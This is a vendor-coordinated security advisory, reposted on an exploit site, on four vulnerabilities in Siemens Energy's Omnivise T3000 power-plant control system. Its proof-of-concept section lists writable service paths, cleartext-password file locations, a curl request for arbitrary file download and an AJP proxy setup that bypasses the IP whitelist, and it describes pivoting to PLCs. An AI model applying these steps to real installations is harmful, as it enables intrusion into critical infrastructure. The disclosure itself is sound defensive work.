Share
## https://sploitus.com/exploit?id=PACKETSTORM:182655
SEC Consult Vulnerability Lab Security Advisory < 20241112-0 >  
=======================================================================  
title: Multiple vulnerabilities  
product: Siemens Energy Omnivise T3000  
vulnerable version: >=8.2 SP3  
fixed version: see solution section  
CVE number: CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879  
impact: High  
homepage: https://www.siemens-energy.com/global/en/home/products-services/product/omnivise-t3000.html  
found: 2024-06-02  
by: Steffen Robertz (Office Vienna)  
Andreas Kolbeck (Office Munich)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"Located in 90 countries, Siemens Energy operates across the whole energy landscape.  
From conventional to renewable power, from grid technology to storage to electrifying  
complex industrial processes.  
  
Our mission is to support companies and countries with what they need to reduce  
greenhouse gas emissions and make energy reliable, affordable, and more sustainable.  
Letโ€™s energize society."  
  
Source: https://www.siemens-energy.com/global/en/home/company/about.html  
  
  
Business recommendation:  
------------------------  
Siemens has released their security advisory SSA-857368, see the following URL  
for further details:  
https://cert-portal.siemens.com/productcert/html/ssa-857368.html#mitigations-section  
  
Follow the mitigation instructions communicated in Omnivise T3000 Technical News 2024-089  
and SE Controls Security Announcement 2024-01.  
  
SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)  
Insecurely configured services or the insecure configuration of their authorizations  
lead to privilege escalation vulnerabilities in the Windows operating system. It is  
possible for a low-privileged user to modify a service in such a way that it executes  
arbitrary code instead of starting the actual service. The service path is writable by  
the "Authenticated Users" group.  
Precondition for exploitation: requires authenticated local access to the Terminal Server  
of the T3000 system.  
  
2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)  
Multiple files containing cleartext passwords were discovered. These can be used  
to jump from host to host and thus compromise the whole security architecture of  
the T3000 system.  
Precondition for exploitation: requires administrative local access to any server of the  
T3000 system.  
  
3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)  
The RemoteDiagnosticView application is a web application hosted on the application  
server. One parameter accepts a full path, which can be abused to download arbitrary  
files.  
Precondition for exploitation: requires administrative remote access to the Application  
server of the T3000 system.  
  
4) IP Whitelist Bypass (CVE-2024-38879)  
The application server is hosting the T3000 web application on port 8080. However,  
only the Terminal Server is whitelisted. This whitelisting can be circumvented by  
exploiting the additionally exposed Tomcat AJP service on port 8009.  
Precondition for exploitation: requires unauthenticated remote access to the Application  
server of the T3000 system  
  
  
Proof of concept:  
-----------------  
1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)  
The following path hosts a file that is used by the "DSGW Service" of the T3000 system:  
  
"E:\dsgw\gw\bin\dsgwservice.exe"  
  
The path is writable by the "Authenticated Users" group.  
  
  
2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)  
Multiple files containing cleartext passwords were discovered.  
  
Terminal Server:  
* C:\Program Files\SPPA-T3000\snmpv3trap\Config.properties (only readable by Admin)  
* E:\DSGW\GW\config_PDC.properties (Passwords are Base64 encoded)  
* C:\Program Files\SPPA-T3000\Logs\AppInstallLogs\PostInstallConfigList.xml (Readable by every user)  
  
  
Application Server:  
* D:\SPPA-T3000\_framework\_jre\installvariables.properties (contains passwords of tomcat and MySQL service  
* D:\SPPA-T3000\Orion\install\_uninstall\installvariables.properties (contains password for MySQL service and installation)  
  
All Servers:  
All servers are being deployed via Puppet. However, the cache file is never  
cleared and contains the initial passwords of all systems of the T3000 system:  
  
"C:\Program Data\PuppetLabs\puppet\cache\client_data\catalog\<uid.json>"  
  
---------------------------------------  
[...]  
"parameters": {  
"foreman_pass": "[redacted]",  
"foreman_url": "[redacted]",  
"foreman_user": "puppet_provider",  
"is_sec": "true",  
"mpssvc_pass": "[redacted]"  
}  
[...]  
"parameters": {  
"crsphost": "XXX.XXX.XXX.XXX",  
"crsppswd": "",  
"crsprepo": "AVPatterns",  
"crspservice": "SFTP",  
"crspuser": "siem_t3000_west",  
"primary_ts": true  
}  
[...]  
"parameters": {  
[...]  
"snmpv3_authpass": "[redacted]",  
"snmpv3_privpass": "[redacted]",  
"snmpv3_user": "snmpuser",  
"snmpv3_hash": "SHA",  
"snmpv3_encrypt": "AES"  
}  
[...]  
"parameters": {  
[...]  
"cyg_server_passwd": "[redacted]",  
[...]  
"fst_appsrv_passwd": "",  
"fst_appsrv_red_hgw_ip": "XXX.XXX.XXX.XXX",  
[...]  
"icmauser_passwd": "[redacted]",  
[...]  
"opcadmin_passwd": "[redacted]",  
"operator01_passwd": "[redacted]",  
"operator02_passwd": "[redacted]",  
"operator03_passwd": "[redacted]",  
"operator04_passwd": "[redacted]",  
"operator05_passwd": "[redacted]",  
"operator06_passwd": "[redacted]",  
"operator07_passwd": "[redacted]",  
"operator08_passwd": "[redacted]",  
"operator09_passwd": "[redacted]",  
"operator10_passwd": "[redacted]",  
"operators_password": "[redacted]",  
"pdm01_passwd": "[redacted]",  
"pdm02_passwd": "[redacted]",  
"pdm03_passwd": "[redacted]",  
"pdm04_passwd": "[redacted]",  
"pdm05_passwd": "[redacted]",  
"pdm06_passwd": "[redacted]",  
"pdm07_passwd": "[redacted]",  
"pdm08_passwd": "[redacted]",  
"pdm09_passwd": "[redacted]",  
"pdm10_passwd": "[redacted]",  
"pmas_passwd": "[redacted]",  
"pmsvc_passwd": "[redacted]",  
"pmts_passwd": "[redacted]",  
"reparchive_passwd": "[redacted]",  
[...]  
"t3kservice_passwd": "[redacted]",  
"[...]  
"tomcatadmin_passwd": "[redacted]",  
"tsuser01_passwd": "[redacted]",  
"tsuser02_passwd": "[redacted]",  
"tsuser03_passwd": "[redacted]",  
"tsuser04_passwd": "[redacted]",  
"tsuser05_passwd": "[redacted]",  
"tsuser06_passwd": "[redacted]",  
"tsuser07_passwd": "[redacted]",  
"tsuser08_passwd": "[redacted]",  
"tsuser09_passwd": "[redacted]",  
"tsuser10_passwd": "[redacted]",  
"txpdomain_passwd": "[redacted]",  
[...]  
"vm_r8_passwd": "[redacted]",  
[...]  
"vm_tc_passwd": "[redacted]",  
[...]  
"vm_ts_passwd": "[redacted]",  
[...]  
"vm_whitelist_hostname": "",  
"vm_whitelist_passwd": "",  
"wbuser01_passwd": "[redacted]",  
"wbuser02_passwd": "[redacted]",  
"wbuser03_passwd": "[redacted]",  
"wbuser04_passwd": "[redacted]",  
"wbuser05_passwd": "[redacted]",  
"wbuser06_passwd": "[redacted]",  
"wbuser07_passwd": "[redacted]",  
"wbuser08_passwd": "[redacted]",  
"wbuser09_passwd": "[redacted]",  
"wbuser10_passwd": "[redacted]",  
"wra01_passwd": "[redacted]",  
[...]  
"dsrm_passwd": "[redacted]",  
[...]  
"dc_passwd": "[redacted]",  
[...]  
"patchsvc_passwd": "[redacted]",  
}  
--------------------------------------------------  
  
To understand the impact of this file, we have to explain a little about the T3000 system.  
The system is split into three levels: Operator, Automation and Process.  
  
Operator Level: This is the level, where thin clients are situated. In our testcase,  
this level consisted of the Terminal Server that engineers could connect to. From here,  
they start the T3000 application, which simply loads a browser and displays a Java  
application served from the Application Server.  
  
Automation Level: This level consists of application and automation servers. The application  
server hosts the not time critical components of power generations such as the web server.  
The automation servers are taking care of time critical operations. In our testcase these  
were PLCs from the SIMATIC S7-CPU family.  
  
Process Level: This level consists of the I/O modules that are controlled by the automation  
servers.  
  
The Terminal Server, located on the operator level already contained the Puppet cache file,  
which contained all the local Windows users used in the T3000 system in clear text. As the  
Terminal Server communicates with the Application Server, they have to be connected via network.  
Thus, the attacker can use the credentials on the Terminal Server to jump to the Application  
Server. This server is in the same segment as the physical PLC CPUs. Thus an attacker can now  
also control the PLCs and thus the whole power plant.  
  
In order to read the Puppet cache file, an attacker has to gain local admin rights first.  
For this, vulnerability 1 can be used.  
  
  
3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)  
The RemoteDiagnosticView website is hosted at the following URL:  
  
http:// <IP Application Server>:8080/RemoteDiagnosticView  
  
In our testcase it was configured using default credentials with the following username and  
an easy to guess password:  
  
txpadmin:[redacted]  
  
Using these credentials an attacker gains an authenticated session. From there, one can  
simply download arbitrary files:  
  
------------------------  
Curl -H "Cookie: JSESSIONID=31B4F2F1BAFC473AB41B65DDF2FD10BA;" -I -H "Content-Type:  
application/x-www-form-urlencoded" -X POST -d "filename=D:\sectest.txt&type=TEXT"  
http://$host:8080/RemoteDiagnosticView/DataServlet  
  
  
HTTP/1.1 200  
Content-Type: text/plain  
Transfer-Encoding: chunked  
[...]  
  
Sectest  
---------------------------------  
  
  
4) IP Whitelist Bypass (CVE-2024-38879)  
The AJP protocol can be used to proxy requests from an Apache server to an application  
running on Tomcat. By setting up a local Apache server and configuring it to use the  
AJP service of the Application Server, the IP filter is circumvented.  
The following setup was built:  
  
------------------------------  
sudo apt-get install libapache2-mod-jk  
sudo vim /etc/apache2/apache2.conf  
# append the following line to the config  
Include ajp.conf  
sudo vim /etc/apache2/ajp.conf  
# create the following file  
ProxyRequests Off  
<Proxy *>  
Order deny,allow  
Deny from all  
Allow from localhost  
</Proxy>  
ProxyPass / ajp://<Application Server IP>:8009/  
ProxyPassReverse / ajp://<Application Server IP>:8009/  
sudo a2enmod proxy_http  
sudo a2enmod proxy_ajp  
sudo systemctl restart apache2  
--------------------------  
Afterwards, the e.g. RemoteDiagnosticView can be loaded from http://127.0.0.1/RemoteDiagnosticView  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* 8.2  
  
According to the vendor (T3000 SE Controls Security Announcement 2024/01 Update 1),  
the following versions and components are affected:  
  
All T3000 Versions >= Release 8.2 SP3:  
* Security Server  
* Thin Clients  
* Terminal Server  
* Application Server  
* Domain Controller  
* PDM VM  
* Whitelisting VM  
* NIDS  
  
  
Vendor contact timeline:  
------------------------  
2024-06-05: Contacting vendor through productcert@siemens.com  
2024-06-06: Siemens assigned S-PCERT#40850  
2024-06-12: Reaching out to specific contacts at Siemens Energy Cybersecurity.  
2024-06-13: They confirm that ProductCERT will get back to us once they have a timeline.  
2024-06-19: Customer informs us about a Siemens Energy Document that recommends to  
change passwords after installation. The document is called "SE Controls  
Security Announcement 2024/01" but only available to T3000 customers.  
2024-06-20: Sending feedback about the document to Siemens Energy Cybersecurity  
as in our opinion it does not solve the issues.  
2024-06-20: They confirm again that ProductCERT is taking care of issues. Asks  
to confirm that we received their messages, which we didn't -> Realized  
that one of our email addresses was dropped during the communication,  
recovered emails from second account.  
2024-06-17/2024-06-24: ProductCERT informs:  
Vulnerability 1 cannot be reproduced in the reference installation.  
The product team is working to find potentially affected installation  
scenarios.  
Vulnerability 2 was reproduced and the product team is working on a mitigation.  
Also, a related customer information has been distributed to customers.  
Vulnerability 3 will be fixed in the next release of the T3000 distribution  
Vulnerability 4 is already fixed in the current version. The product team is  
investigating, if this vulnerability is present in still supported versions.  
2024-06-21: ProductCERT informs us that they are able to reproduce all of the vulnerabilities  
and provide fixes for most of them. Advisory draft should be shared with  
SEC Consult next week. Ask to keep communication directed at ProductCERT  
instead of Cybersecurity team.  
2024-06-28: ProductCERT sends over advisory draft. Could reproduce all vulnerabilities  
and requested CVEs.  
2024-07-03: Siemens ProductCERT requests if we received the draft, as SEC Consult didn't answer yet.  
2024-07-03: SEC Consult confirms the reception of the advisory draft.  
2024-07-04: Submitted feedback for advisory draft to ProductCERT. From SEC Consult's  
understanding, changing passwords after initial installation only fixes the  
cleartext passwords in log files. The puppet issue would not be fixed.  
Thus SEC Consult proposed to split Vulnerability 2 into two separate findings.  
2024-07-05: ProductCERT forwarded feedback to product team.  
2024-08-02: ProductCERT publishes SSA-857368.  
2024-08-05: Informing ProductCERT of vacation/absences, will coordinate further afterwards.  
2024-10-03: Proposing a meeting with ProductCERT to clarify and discuss all open issues.  
2024-10-22: Meeting with ProductCERT.  
2024-10-24: ProductCERT sends us further documents for T3000 regarding fixes/mitigations.  
2024-10-31: Sending advisory draft to ProductCERT, proposing advisory release date for 7th  
November.  
2024-11-06: Receiving feedback from ProductCERT, postponing release to 12th November.  
2024-11-12: Coordinated release of advisory.  
  
  
Solution:  
---------  
Change the passwords to all components. Detailed instructions and patch information  
can be found when following Omnivise T3000 Technical News 2024-089 and SE Controls  
Security Announcement 2024-01.  
  
Release 9.2 Fix / Mitigations:  
Issue 1 (CVE-2024-38876)  
* System Software Patch 22.173.20  
* System Software Patch 22.173.52  
* Application Software Patch 09.0.19.06  
  
Issue 2 (CVE-2024-38877)  
* System Software Patches 22.173.52  
* Application Software Patch 09.0.19.06  
* Technical News 2024-089  
  
Issue 3 (CVE-2024-38878)  
* Application Software Patch 09.0.19.06  
  
Issue 4 (CVE-2024-38879)  
* Application Software Patch 09.0.19.06  
  
  
Release 8.2 SP4 Fix / Mitigations:  
Patches are currently under development.  
  
Release 8.2 SP3 Fix / Mitigations:  
Currently no fixes are planned, but see Technical News 2024-089 for issue 2 (CVE-2024-38877)  
  
  
Workaround:  
-----------  
Limit access to the terminal servers.  
  
CVE-2024-38877: If the passwords are suspected to be compromised, change the passwords  
for all computers and service accounts. In addition follow the instructions from  
Omnivise T3000 Technical News 2024-089, which is available through T3000 customer  
service and applies to releases 8.2 SP3/SP4 and 9.2.  
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Steffen Robertz, Andreas Kolbeck/ @2024